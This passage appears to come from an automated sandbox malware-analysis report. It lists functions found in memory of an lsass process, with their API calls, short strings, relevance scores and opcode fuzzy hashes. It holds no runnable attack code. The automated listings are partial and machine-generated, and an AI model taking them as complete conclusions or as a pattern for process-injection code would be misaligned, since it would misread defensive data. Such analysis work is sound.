                                                          • Snapshot File: hcaresult_41_2_161c7370000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                          • String ID: d
                                                          • API String ID: 3743429067-2564639436
                                                          • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                          • Instruction ID: d2a441ea58f802f9db0bf99bc7a27dd4e076b307d94cceac5ae1d91cbc4e37e0
                                                          • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                          • Instruction Fuzzy Hash: 5B417F73214B84D6E760CF21E9543AEB7B1F388B98F089129DA890BB58DF79C549CB00
                                                          Function 00000161C737D068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • FlsGetValue.KERNEL32(?,?,?,00000161C737C7DE,?,?,?,?,?,?,?,?,00000161C737CF9D,?,?,00000001), ref: 00000161C737D087
                                                          • FlsSetValue.KERNEL32(?,?,?,00000161C737C7DE,?,?,?,?,?,?,?,?,00000161C737CF9D,?,?,00000001), ref: 00000161C737D0A6
                                                          • FlsSetValue.KERNEL32(?,?,?,00000161C737C7DE,?,?,?,?,?,?,?,?,00000161C737CF9D,?,?,00000001), ref: 00000161C737D0CE
                                                          • FlsSetValue.KERNEL32(?,?,?,00000161C737C7DE,?,?,?,?,?,?,?,?,00000161C737CF9D,?,?,00000001), ref: 00000161C737D0DF
                                                          • FlsSetValue.KERNEL32(?,?,?,00000161C737C7DE,?,?,?,?,?,?,?,?,00000161C737CF9D,?,?,00000001), ref: 00000161C737D0F0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000029.00000002.2633431952.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_41_2_161c7370000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Value
                                                          • String ID: 1%$Y%
                                                          • API String ID: 3702945584-1395475152
                                                          • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                          • Instruction ID: 5b37b94af42f5e6aa913e3f6aa8b997d1927e3f9b651398788ff175affcd3a81
                                                          • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                          • Instruction Fuzzy Hash: 6E11513079428461FAAAE7355F533FDE2816B847F0F2C7324A839167DADEABC4028601
                                                          Function 00000161C7377510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000029.00000002.2633431952.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_41_2_161c7370000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                          • String ID:
                                                          • API String ID: 190073905-0
                                                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                          • Instruction ID: ebe7c8ee03eb4ac3fac3f773ca9664685eaa3076fc6306765f255d13f7e35eb5
                                                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                          • Instruction Fuzzy Hash: 1181C071780741A6FA50EB399E493FDE3D1AB85780F5CB429DA04477AAEBFBC8458700
                                                          Function 00000161C7379DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000029.00000002.2633431952.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_41_2_161c7370000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                          • String ID: api-ms-
                                                          • API String ID: 2559590344-2084034818
                                                          • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                          • Instruction ID: 2b52fc22f011f295c7def971b7465c2e7d78e49bbbccdec479b3560cfa5072a2
                                                          • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                          • Instruction Fuzzy Hash: 0B31E631396A40F1EE51DB42AE407FDA794F748BA0F5D27259D2D4BB91EFBAC4458300
                                                          Function 00000161C7383DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000029.00000002.2633431952.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_41_2_161c7370000_lsass.jbxd
                                                          Similarity
                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                          • String ID: CONOUT$
                                                          • API String ID: 3230265001-3130406586
                                                          • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                          • Instruction ID: c15602c81fcd29b203e140cde97240c67c9996037617398216eb6805406259a6
                                                          • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                          • Instruction Fuzzy Hash: 3511BF32350B8092E750CB12EC443AD73A0F788FE4F081226EA2A87795CFB9C8048744
                                                          Function 00000161C7373790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000029.00000002.2633431952.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_41_2_161c7370000_lsass.jbxd
                                                          Similarity
                                                          • API ID: CurrentProcessProtectVirtual$HandleModule
                                                          • String ID: wr
                                                          • API String ID: 1092925422-2678910430
                                                          • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                          • Instruction ID: bc9ab04ba46eeafb57c052b3f7379970072e33f92b55afbbc2cde855626b40ad
                                                          • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                          • Instruction Fuzzy Hash: 4E118B76344B80E2EF14DB22E9042BDA6A0FB88B85F081129DE9D0B795EF7EC549C704
                                                          Function 00000161C7375B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000029.00000002.2633431952.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_41_2_161c7370000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Thread$Current$Context
                                                          • String ID:
                                                          • API String ID: 1666949209-0
                                                          • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                          • Instruction ID: 9094ae8bbd5e7428b61b293e00800f6eb99ffa20e7548135384c7be0e92e88b5
                                                          • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                          • Instruction Fuzzy Hash: 12D1B936245B8892DB74DB1AE9943AEB7A0F3C8B84F141116EACD47BA9CF7DC541CB10
                                                          Function 00000161C7372F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000029.00000002.2633431952.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_41_2_161c7370000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocFree
                                                          • String ID: dialer
                                                          • API String ID: 756756679-3528709123
                                                          • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                          • Instruction ID: ca265d65df0d04253fc69862a8fb11504af9d73487d06f97cf1b967590bc3659
                                                          • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                          • Instruction Fuzzy Hash: 6231A332742B55E2EB15DF16EE407BDA7A0FB44B84F0C9025DE4947B56EFB6C4A18700
                                                          Function 00000161C737CFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000029.00000002.2633431952.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_41_2_161c7370000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Value$ErrorLast
                                                          • String ID:
                                                          • API String ID: 2506987500-0
                                                          • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                          • Instruction ID: 3760ef9c366b9f6f26106eafd8b2fdf9c68472c758219538aff254040de0a216
                                                          • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                          • Instruction Fuzzy Hash: 321172303D5684A2FA65E7319F567FDA2826B847F0F1C7724A836477DADEEB84028301
                                                          Function 00000161C737199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000029.00000002.2633431952.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_41_2_161c7370000_lsass.jbxd
                                                          Similarity
                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                          • String ID:
                                                          • API String ID: 517849248-0
                                                          • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                          • Instruction ID: 63cdeed5462032a3e938a19fae7407b13eff58c5cf8497109542025841dc4e31
                                                          • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                          • Instruction Fuzzy Hash: 79016931340A40D2EB50DB52E8587ADA3A1F788FC0F885036DE9943766DFBEC989C700
                                                          Function 00000161C73736C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000029.00000002.2633431952.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_41_2_161c7370000_lsass.jbxd
                                                          Similarity
                                                          • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                          • String ID:
                                                          • API String ID: 449555515-0
                                                          • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                          • Instruction ID: 13f93086134f10dc625d79ce23f25bde8beb2fa4b9f349cb9c14fd2dfb15c8e8
                                                          • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                          • Instruction Fuzzy Hash: 39012D75355B80D2EB24DB22EC083AE63A0BB85B86F085425CD590B756EFBEC148C705
                                                          Function 00000161C7378FE8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000029.00000002.2633431952.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_41_2_161c7370000_lsass.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                          • String ID: csm$f
                                                          • API String ID: 2395640692-629598281
                                                          • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                          • Instruction ID: 82e0485bbc4e82a33e6e1fe2b3db116c6b45c57ac0bf06cb0b504662ad987d9a
                                                          • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                          • Instruction Fuzzy Hash: BB510432351600AEEB14CF15ED48BBDBBA6F344BD8F59A224DE0647788DBB6C851CB00
                                                          Function 00000161C7373044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000029.00000002.2633431952.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_41_2_161c7370000_lsass.jbxd
                                                          Similarity
                                                          • API ID: CombinePath
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3422762182-91387939
                                                          • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                          • Instruction ID: 63af4f46585661ab2263701b6a6f6606a3fa1190f941ae7cdca0a7faf7e25b44
                                                          • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                          • Instruction Fuzzy Hash: 04F01275754B84E2EA14CB53FE141BDA661AB48FD1F0C6131EE464BB29DFBEC4858700
                                                          Function 00000161C737BC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000029.00000002.2633431952.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_41_2_161c7370000_lsass.jbxd
                                                          Similarity
                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                          • String ID: CorExitProcess$mscoree.dll
                                                          • API String ID: 4061214504-1276376045
                                                          • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                          • Instruction ID: 01a1f30fbebce27b69994ce7889e2f8a76aba4a8d7541e62fe22d7b7097c0c43
                                                          • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                          • Instruction Fuzzy Hash: 18F06271351705E1EB10CB24EC443BD6331EB84761F58221ACA6A451E5DFBEC1498300
                                                          Function 00000161C73750D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000029.00000002.2633431952.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_41_2_161c7370000_lsass.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread
                                                          • String ID:
                                                          • API String ID: 2882836952-0
                                                          • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                          • Instruction ID: dba752f5bb8b1dc241bba646b4da80e6243ea972c4de78f9310afac640f1831e
                                                          • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                          • Instruction Fuzzy Hash: 1802E932259B8496EB64CB55F9943AEF7A0F3C4790F145015EA8E87BA8DFBDC444CB10
                                                          Function 00000161C7375710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000029.00000002.2633431952.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_41_2_161c7370000_lsass.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread
                                                          • String ID:
                                                          • API String ID: 2882836952-0
                                                          • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                          • Instruction ID: c252f1135a0418cebe322a54b3ae4493ef16c41dde112c7534c5cd66705c66a0
                                                          • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                          • Instruction Fuzzy Hash: 6361DB36659B84D7E764CF15E9443AEB7A0F388784F142115EA8E47BA8DBBEC940CF10
                                                          Function 00000161C7353504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000029.00000002.2633242451.00000161C7340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7340000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_41_2_161c7340000_lsass.jbxd
                                                          Similarity
                                                          • API ID: _set_statfp
                                                          • String ID:
                                                          • API String ID: 1156100317-0
                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                          • Instruction ID: fde78ee88741be07c66af00455e192fd3794230c853552cfa2695d727ba0c473
                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                          • Instruction Fuzzy Hash: 9B11A3B2AD0A1D31FAE49528EC413FD1981AB5837CF5CBE28A9660E2D6CAE6C8414100
                                                          Function 00000161C7384104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000029.00000002.2633431952.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_41_2_161c7370000_lsass.jbxd
                                                          Similarity
                                                          • API ID: _set_statfp
                                                          • String ID:
                                                          • API String ID: 1156100317-0
                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                          • Instruction ID: 6c3ac0c53c04b32437a32d50f10de376d3b554060719c4b389168e03aacde716
                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                          • Instruction Fuzzy Hash: 1F11A032AD0B5031F764DD68ED523FD13406BB83B8F2C2626A97607FE6CAFAC8414200
                                                          Function 00000161C734F040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000029.00000002.2633242451.00000161C7340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7340000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_41_2_161c7340000_lsass.jbxd
                                                          Similarity
                                                          • API ID: _invalid_parameter_noinfo
                                                          • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                          • API String ID: 3215553584-4202648911
                                                          • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                          • Instruction ID: 0cbd1cadbb5640ee94eef0d06c399184e07e68e80a9cae252abfdb43f9b808a3
                                                          • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                          • Instruction Fuzzy Hash: 1F61E37E680246A2FAAEDB65ED447FE2EA0F785780F5D7415CA0A137A4DBF7C8418301
                                                          Function 00000161C737AA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000029.00000002.2633431952.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_41_2_161c7370000_lsass.jbxd
                                                          Similarity
                                                          • API ID: CallEncodePointerTranslator
                                                          • String ID: MOC$RCC
                                                          • API String ID: 3544855599-2084237596
                                                          • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                          • Instruction ID: e721f981235fc6c16ed102fd79cf53d389afd381c3b6a3f2bd3d32e380537905
                                                          • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                          • Instruction Fuzzy Hash: C2618F33600B849AEB10DF69D9403EDBBA0F348B88F186215EF8957B99DBB9C595C740
                                                          Function 00000161C734A178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000029.00000002.2633242451.00000161C7340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7340000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_41_2_161c7340000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                          • String ID: csm$csm
                                                          • API String ID: 3896166516-3733052814
                                                          • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                          • Instruction ID: 011561dd815c6fb4c5d785c4625218d2fc99bbc18d0d52541a72970cdf006f1b
                                                          • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                          • Instruction Fuzzy Hash: 34518F3A140280EAEB78CF5598443FC7FA0F355B88F1C611ADA99A7BD5DBBAD450C700
                                                          Function 00000161C737AD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000029.00000002.2633431952.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_41_2_161c7370000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                          • String ID: csm$csm
                                                          • API String ID: 3896166516-3733052814
                                                          • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                          • Instruction ID: 03cbb94390825a3a813dd56d949320f207ef0da5c74af7d3298fcb1d2a374ebf
                                                          • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                          • Instruction Fuzzy Hash: 3D519172140380EAEB74CF199E943BDB7A0F354B95F1C6216EA9987BD5CBB9D460CB00
                                                          Function 00000161C7348405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000029.00000002.2633242451.00000161C7340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7340000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_41_2_161c7340000_lsass.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                          • String ID: csm$f
                                                          • API String ID: 3242871069-629598281
                                                          • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                          • Instruction ID: 58a27f023612b3df53fecf0fb0b0e16451934c199b5710de07134536ca7fd473
                                                          • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                          • Instruction Fuzzy Hash: E051E07A741600ABEB58DF16E804BFC3BA5F350B98F58A164DE1643788EBB6DD41CB04
                                                          Function 00000161C73483E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000029.00000002.2633242451.00000161C7340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7340000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_41_2_161c7340000_lsass.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                          • String ID: csm$f
                                                          • API String ID: 3242871069-629598281
                                                          • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                          • Instruction ID: 9953bb7cc1b9c22cb0e50862b2d9a995ee6781928d2ea8a7d44617e3883f8d01
                                                          • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                          • Instruction Fuzzy Hash: BB31DD7A241750EAE758DF12EC44BED3BA4F340B88F09A014EE5B07788DBBAD941CB04
                                                          Function 00000161C7382058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000029.00000002.2633431952.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_41_2_161c7370000_lsass.jbxd
                                                          Similarity
                                                          • API ID: FileWrite$ConsoleErrorLastOutput
                                                          • String ID:
                                                          • API String ID: 2718003287-0
                                                          • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                          • Instruction ID: 51083b197dc19ea5086e39b9429a098d72bf4425468d22591da6c5e9eed8f7dc
                                                          • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                          • Instruction Fuzzy Hash: F2D13672B14A80A9E711CFB9D8403EC3BB1F3547D8F189216CE5E97B9ADA76C506C344
                                                          Function 00000161C73714A4 Relevance: 6.3, APIs: 5, Instructions: 39memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000029.00000002.2633431952.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_41_2_161c7370000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$Free
                                                          • String ID:
                                                          • API String ID: 3168794593-0
                                                          • Opcode ID: 23e5596e6afe4154b2baf6c6de4ac956f245c11af45a2c6a236834124d1c642c
                                                          • Instruction ID: ab1cd810ebea2386d4eb6ea7e24814d6cccad5f30e93e0dd96ba134f2f4ead5c
                                                          • Opcode Fuzzy Hash: 23e5596e6afe4154b2baf6c6de4ac956f245c11af45a2c6a236834124d1c642c
                                                          • Instruction Fuzzy Hash: EE014836640AA0E6E714DF66ED042AEA7B0F788FC1F086426EB4A4372BDE79C051C740
                                                          Function 00000161C7382980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000029.00000002.2633431952.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_41_2_161c7370000_lsass.jbxd
                                                          Similarity
                                                          • API ID: ConsoleErrorLastMode
                                                          • String ID:
                                                          • API String ID: 953036326-0
                                                          • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                          • Instruction ID: dcc8fc54f6c6121945e575b01d72a1d54ede071e9550784d482a9f68f01b5102
                                                          • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                          • Instruction Fuzzy Hash: B591D472750A50A9F761DF658C403FD2BA0F748B98F1CA10ADE4A57786DBB6C482C708
                                                          Function 00000161C7377960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000029.00000002.2633431952.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_41_2_161c7370000_lsass.jbxd
                                                          Similarity
                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                          • String ID:
                                                          • API String ID: 2933794660-0
                                                          • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                          • Instruction ID: 52265231d10cd15cca918b45e152c154aca55c4b2e2ad76805f864bc27ca0743
                                                          • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
